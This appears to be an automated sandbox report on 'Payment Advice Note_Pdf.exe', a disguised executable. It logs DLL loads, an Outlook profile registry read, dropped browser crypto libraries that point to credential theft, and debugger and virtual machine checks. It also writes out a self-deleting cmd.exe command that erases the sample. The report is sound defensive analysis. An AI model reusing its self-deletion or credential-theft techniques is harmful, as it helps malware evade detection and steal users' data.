Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: crtdll.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Payment Advice Note_Pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000000.00000002.1305639727.00000000077F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\mozglue.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\ucrtbase.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\vcruntime140.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\msvcp140.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API/Special instruction interceptor: Address: 7E6848C
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API/Special instruction interceptor: Address: 46E848C
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406362 FindFirstFileW,FindClose, 0_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00406362 FindFirstFileW,FindClose, 2_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004027FB FindFirstFileW, 2_2_004027FB
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005380000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00403868 GetTempPathW,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW, 0_2_00403868
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
